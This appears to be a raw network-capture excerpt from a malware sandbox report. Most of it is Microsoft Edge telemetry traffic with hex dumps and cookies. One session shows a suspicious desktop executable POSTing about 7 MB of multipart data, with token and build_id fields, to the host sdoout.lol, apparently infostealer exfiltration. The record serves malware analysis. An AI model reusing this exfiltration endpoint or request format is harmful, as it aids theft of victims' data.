                                                                                                                                                                                                                                                                                          Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=0D1D943A7B9D67B72691815F7AEF6664; domain=.msn.com; expires=Sat, 24-Jan-2026 14:55:40 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                          Set-Cookie: SRM_M=0D1D943A7B9D67B72691815F7AEF6664; domain=c.msn.com; expires=Sat, 24-Jan-2026 14:55:40 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 06-Jan-2025 14:55:40 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 30-Dec-2024 15:05:40 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:39 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          34192.168.2.95394320.189.173.84434108C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:41 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735570540045&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 11920
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0D1D943A7B9D67B72691815F7AEF6664; _EDGE_S=F=1&SID=38B0BBDA67E56A6606D2AEBF66AE6B66; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:41 UTC11920OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 30 54 31 34 3a 35 35 3a 34 30 2e 30 34 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 61 63 33 38 35 63 63 37 2d 31 30 34 61 2d 34 36 39 39 2d 62 63 64 39 2d 38 37 34 63 32 63 61 31 38 30 37 63 22 2c 22 65 70 6f 63 68 22 3a 22 31 39 31 33 37 33 31 34 36 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-30T14:55:40.044Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"ac385cc7-104a-4699-bcd9-874c2ca1807c","epoch":"1913731461"},"app":{"locale
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:41 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=725db871e1da427a8ea217c0cf49ad2c&HASH=725d&LV=202412&V=4&LU=1735570541776; Domain=.microsoft.com; Expires=Tue, 30 Dec 2025 14:55:41 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=010b55bfa19248149b32888efb4909f2; Domain=.microsoft.com; Expires=Mon, 30 Dec 2024 15:25:41 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: 1731
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:40 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          35192.168.2.95394220.189.173.84434108C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:41 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735570540049&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 5218
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0D1D943A7B9D67B72691815F7AEF6664; _EDGE_S=F=1&SID=38B0BBDA67E56A6606D2AEBF66AE6B66; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:41 UTC5218OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 30 54 31 34 3a 35 35 3a 34 30 2e 30 34 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 61 63 33 38 35 63 63 37 2d 31 30 34 61 2d 34 36 39 39 2d 62 63 64 39 2d 38 37 34 63 32 63 61 31 38 30 37 63 22 2c 22 65 70 6f 63 68 22 3a 22 31 39 31 33 37 33 31 34 36 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-30T14:55:40.048Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"ac385cc7-104a-4699-bcd9-874c2ca1807c","epoch":"1913731461"},"app":{"locale
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:41 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=119b3c8cca7d49a2827ba976153b6b3b&HASH=119b&LV=202412&V=4&LU=1735570541773; Domain=.microsoft.com; Expires=Tue, 30 Dec 2025 14:55:41 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=5d88278450f74fefbdfc590e37a84533; Domain=.microsoft.com; Expires=Mon, 30 Dec 2024 15:25:41 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: 1724
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:41 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          36192.168.2.95394620.189.173.84434108C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735570540887&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 5418
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0D1D943A7B9D67B72691815F7AEF6664; _EDGE_S=F=1&SID=38B0BBDA67E56A6606D2AEBF66AE6B66; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC5418OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 30 54 31 34 3a 35 35 3a 34 30 2e 38 38 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 61 63 33 38 35 63 63 37 2d 31 30 34 61 2d 34 36 39 39 2d 62 63 64 39 2d 38 37 34 63 32 63 61 31 38 30 37 63 22 2c 22 65 70 6f 63 68 22 3a 22 31 39 31 33 37 33 31 34 36 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-30T14:55:40.881Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"ac385cc7-104a-4699-bcd9-874c2ca1807c","epoch":"1913731461"},"app":{"locale
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=0a613c5ff7484f19af38cbe85ae469c1&HASH=0a61&LV=202412&V=4&LU=1735570542566; Domain=.microsoft.com; Expires=Tue, 30 Dec 2025 14:55:42 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=3997d7baf9214434ba625683207ab7cb; Domain=.microsoft.com; Expires=Mon, 30 Dec 2024 15:25:42 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: 1679
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:42 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          37192.168.2.953948116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ngdbs2nop8ymymymym7y
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 6990993
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6e 67 64 62 73 32 6e 6f 70 38 79 6d 79 6d 79 6d 79 6d 37 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6e 67 64 62 73 32 6e 6f 70 38 79 6d 79 6d 79 6d 79 6d 37 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6e 67 64 62 73 32 6e 6f 70 38 79 6d 79 6d 79 6d 79 6d 37 79 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ngdbs2nop8ymymymym7yContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------ngdbs2nop8ymymymym7yContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------ngdbs2nop8ymymymym7yCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
